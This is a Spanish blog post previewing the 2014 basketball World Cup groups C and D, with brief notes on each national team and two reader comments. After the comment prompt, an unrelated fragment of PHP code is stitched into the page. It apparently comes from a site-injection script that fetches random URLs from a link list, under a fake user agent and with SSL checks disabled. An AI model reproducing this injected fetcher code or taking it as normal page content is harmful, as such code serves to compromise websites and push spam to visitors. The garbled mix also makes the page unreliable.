Mundobasket 2014: Previa grupos C y D

28 de August de 2014 por TheDeerHunter

GRUPO C

USA: La convocatoria norteamericana para este mundobasket viene marcada por las ausencias. Si se hace memoria de lo que pasó en la última final olímpica deberían estar preocupados ante las irremplazables bajas de hombres del calibre de Durant, LeBron, Melo o Kobe, junto a la terrible lesión de Paul George. Sin embargo, la lista definitiva aún sigue siendo temible y mantienen el cartel de favoritos para ganar el campeonato. Extraña un poco la presencia de Derrick Rose en detrimento de Damian Lillard. Se habría entendido perfectamente su renuncia. Le acompañan como guards Stephen Curry y Kyrie Irving, de escoltas James Harden y Demar DeRozan, de aleros Rudy Gay y Klay Thompson más un juego interior brutal formado por Anthony Davis, Demarcus Cousins, Andre Drummond, Kenneth Faried… y, como sorpresa, Mason Plumlee, cuya presencia ha generado mucha polémica y cierto malestar. Se llegó incluso a rumorear que haría caer de la misma a Cousins o Drummond, aunque al final se quedó en lugar de Parsons, Hayward o Korver. No resulta muy comprensible. El equipo apunta a un estilo distinto a las recientes selecciones, mucho más pesado, y hay que ver cómo se adapta al baloncesto FIBA y a las zonas que seguro van a tener enfrente.

Omer AsikTurquía: Los vigentes subcampeones han perdido muchas opciones por el camino. En la era post Turkoglu necesariamente se notarán las ausencias de Kanter, Erden o Ilyasova. El único NBA que defenderá los colores de su selección es Omer Asik. Suficiente para llevar a su selección a los cruces pero no mucho más allá.

Finlandia: Su único NBA, Erik Murphy, no es precisamente el líder de este equipo. Sabemos que vienen haciéndolo bien en los últimos campeonatos internacionales y que son particularmente vistosos de ver. Alcanzarán los cruces y una vez allí son capaces de dar algún que otro susto.

República Dominicana: Sus credenciales son el cuarto puesto del pasado torneo americano y se dice de ellos que son la mejor generación de la historia del país. Cuentan con el veterano Francisco García en sus filas.

Ucrania: Debutan en un campeonato del mundo sin ningún NBA. Se disputarán el pase a la siguiente fase con la República Dominicana.

Nueva Zelanda: Llegaron a octavos en Turquía 2010 mostrando un gran nivel de juego. Tratarán de repetir ese hito, aunque no van a tener fácil superar la liguilla. Sin representación NBA.

GRUPO D

Lituania: Potente selección. Quizá no tenga potencial para amenazar seriamente a USA pero sí para alcanzar semifinales. Cuentan con Donatas Motiejunas y Jonas Valanciunas, que deberían dar ya un paso adelante en su selección.

Goran DragicEslovenia: Ya no cuentan con la batería de NBAs de antaño, aunque sí con uno de los grandes de Europa como es Goran Dragic. Intentará brillar y llevar a su selección lo más lejos posible.

Australia: Interesante selección, con un buen puñado de jóvenes perlas que tenemos muchas ganas de ver en acción. Dante Exum es la estrella de este equipo y acaparará muchos focos, Matthew Dellavedova, Cameron Bairstow y Aaron Baynes le acompañan. Superarán bien la liguilla, aunque después la falta de experiencia puede ser un hueso.

México: Cuentan con Gustavo Ayón y Jorge Gutiérrez. Se espera que superen a Angola y Corea pero poco más.

Angola: Los campeones de África difícilmente pasarán de primera fase. Sin representación NBA.

Corea: Uno de los equipos más flojos del campeonato. Sin representación NBA.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Decepcionante no, lo siguiente, la actuación de Omer Asik. No parece que el papel de protagonista vaya con él, o al menos en ataque. Horribles también los bases australianos Dellavedova y Exum.

    En el otro extremo, exhibición de Goran Dragic, muy buenos partidos de Valanciunas y Motiejunas, y asustando USA.

      Citar

  2. rumbero dice:
    #2

    MagicJohnson32:
    Decepcionante no, lo siguiente, la actuación de Omer Asik

    Veo que el poder del blog sigue intacto. Rajada y un 16-20 contra Ucrania…eso sí para acabar palmando. Dios bendiga a los ninjas de Fratello.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>